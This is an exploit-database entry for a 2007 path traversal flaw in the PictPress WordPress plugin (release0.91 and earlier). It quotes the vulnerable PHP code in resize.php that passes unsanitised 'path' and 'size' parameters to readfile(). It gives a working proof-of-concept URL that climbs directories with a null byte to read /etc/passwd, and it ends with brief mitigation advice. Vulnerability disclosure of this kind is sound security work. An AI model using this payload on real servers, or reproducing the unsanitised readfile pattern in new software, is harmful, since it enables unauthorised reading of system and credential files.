header-logo
Suggest Exploit
vendor:
PictPress
by:
Anonymous
7.5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: PictPress
Affected Version From: Unspecified
Affected Version To: release0.91
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WordPress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability

The vulnerability allows an attacker to disclose arbitrary files on the server by exploiting a file path traversal issue in the 'resize.php' script of the PictPress WordPress plugin. By manipulating the 'size' and 'path' parameters in the URL, an attacker can traverse directories and read sensitive files, such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, it is recommended to update the PictPress plugin to a version that includes a fix for the file path traversal issue. Alternatively, the plugin can be deactivated or removed if it is not essential for the website's functionality.
Source

Exploit-DB raw data:

Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

# milw0rm.com [2007-12-05]

Navigation

Suggest Exploit

Services By CQR